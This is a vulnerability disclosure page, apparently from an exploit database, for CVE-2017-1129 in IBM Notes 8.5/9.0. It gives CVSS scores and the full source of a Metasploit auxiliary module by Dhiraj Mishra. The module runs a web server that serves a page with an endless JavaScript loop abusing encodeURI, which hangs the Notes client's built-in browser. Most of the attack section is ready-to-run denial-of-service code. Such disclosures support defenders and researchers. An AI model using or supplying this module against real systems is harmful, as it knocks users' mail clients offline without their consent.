IBM Notes 8.5 / 9.0 encodeURI Denial Of Service

2017.10.11
Credit: Dhiraj Mishra
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#Here is an MSF Module for CVE-2017-1129 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => "IBM Notes encodeURI DOS", 'Description' => %q( This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, it could cause the Notes client to hang and have to be restarted. ), 'License' => MSF_LICENSE, 'Author' => [ 'Dhiraj Mishra', ], 'References' => [ [ 'EXPLOIT-DB', '42602'], [ 'CVE', '2017-1129' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid= swg21999385' ] ], 'DisclosureDate' => 'Aug 31 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' ) ) end def run exploit # start http server end def setup @html = %| <html><head><title>DOS</title> <script type="text/javascript"> while (true) try { var object = { }; function d(d0) { var d0 = (object instanceof encodeURI)('foo'); } d(75); } catch (d) { } </script> </head></html> | end def on_request_uri(cli, _request) print_status('Sending response') send_response(cli, @html) end end URL :https://github.com/rapid7/metasploit-framework/blob/ master/modules/auxiliary/dos/http/ibm_lotus_notes.rb Thank you -- Regards *Dhiraj Mishra.*GPG ID : 51720F56 | Finger Print : 1F6A FC7B 05AA CF29 8C1C ED65 3233 4D18 5172 0F56


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top